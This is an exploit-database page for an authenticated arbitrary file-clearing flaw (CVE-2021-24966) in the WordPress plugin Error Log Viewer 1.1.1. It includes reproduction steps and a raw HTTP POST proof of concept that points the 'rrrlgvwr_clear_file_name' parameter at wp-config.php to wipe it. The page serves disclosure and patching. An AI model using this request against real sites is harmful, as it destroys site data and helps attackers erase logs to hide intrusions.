header-logo
Suggest Exploit
vendor:
Error Log Viewer
by:
Ceylan Bozogullarindan
4.9
CVSS
MEDIUM
Arbitrary File Clearing
22
CWE
Product Name: Error Log Viewer
Affected Version From: 1.1.2001
Affected Version To: 1.1.2001
Patch Exists: YES
Related CWE: CVE-2021-24966
CPE: a:wordpress_plugin:error_log_viewer:1.1.1
Metasploit:
Other Scripts:
Platforms Tested: Linux
2021

WordPress Plugin Error Log Viewer 1.1.1 – Arbitrary File Clearing (Authenticated)

The value of a file path which is going to be deleted is not properly and sufficiently controlled. The parameter 'rrrlgvwr_clear_file_name' can be manipulated only by authenticated users.

Mitigation:

Update to the latest version of the plugin. Limit access to the 'rrrlgvwr_clear_file_name' parameter to trusted authenticated users only.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)
# Date: 09-11-2021
# Exploit Author: Ceylan Bozogullarindan
# Exploit Website: https://bozogullarindan.com
# Vendor Homepage: https://bestwebsoft.com/
# Software Link: https://bestwebsoft.com/products/wordpress/plugins/error-log-viewer/
# Version: 1.1.1
# Tested on: Linux
# CVE: CVE-2021-24966 (https://wpscan.com/vulnerability/166a4f88-4f0c-4bf4-b624-5e6a02e21fa0)


# Description:

Error Log Viewer is a simple utility plugin that helps to find and view log files with errors right from the WordPress admin dashboard. Get access to all log files from one place. View the latest activity, select logs by date, view a full log file or clear a log file!

I've especially emphasized "clearing a log file" statement because the feature of "clearing a log file" can be used to delete an arbitrary file in a Wordpress web site. The reason of the vulnerability is that, the value of a file path which is going to be deleted is not properly and sufficiently controlled. Name of the parameter leading to the vulnerability is "rrrlgvwr_clear_file_name". It can be manipulated only authenticated users.

An attacker can use this vulnerability; to destroy the web site by deleting wp-config.php file, or to cover the fingerprints by clearing related log files.

# Steps To Reproduce

1. Install and activate the plugin.
2. Click the "Log Monitor" available under Error Log Viewer menu item.
3. Choose a log file to clear.
4. Intercept the request via Burp or any other local proxy tool.
5. Replace the value of the parameter "rrrlgvwr_clear_file_name" with a file path which is going to be cleared, such as /var/www/html/wp-config.php.
6. Check the content of the cleared file. You will see that the file is empty.


# PoC - Supported Materials

---------------------------------------------------------------------------
POST /wp-admin/admin.php?page=rrrlgvwr-monitor.php HTTP/1.1
Host: 127.0.0.1:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 603
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: [admin+]

rrrlgvwr_select_log=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Flearnpress%2Finc%2Fgateways%2Fpaypal%2Fpaypal-ipn%2Fipn_errors.log&rrrlgvwr_lines_count=10&rrrlgvwr_from=&rrrlgvwr_to=&rrrlgvwr_show_content=all&rrrlgvwr_newcontent=%5B05-Feb-2015+07%3A28%3A49+UTC%5D+Invalid+HTTP+request+method.%0D%0A%0D%0A++++++++++++++++++++++++&rrrlgvwr_clear_file=Clear+log+file&rrrlgvwr_clear_file_name=/var/www/html/wp-config.php&rrrlgvwr_nonce_name=1283d54cc5&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Drrrlgvwr-monitor.php
---------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR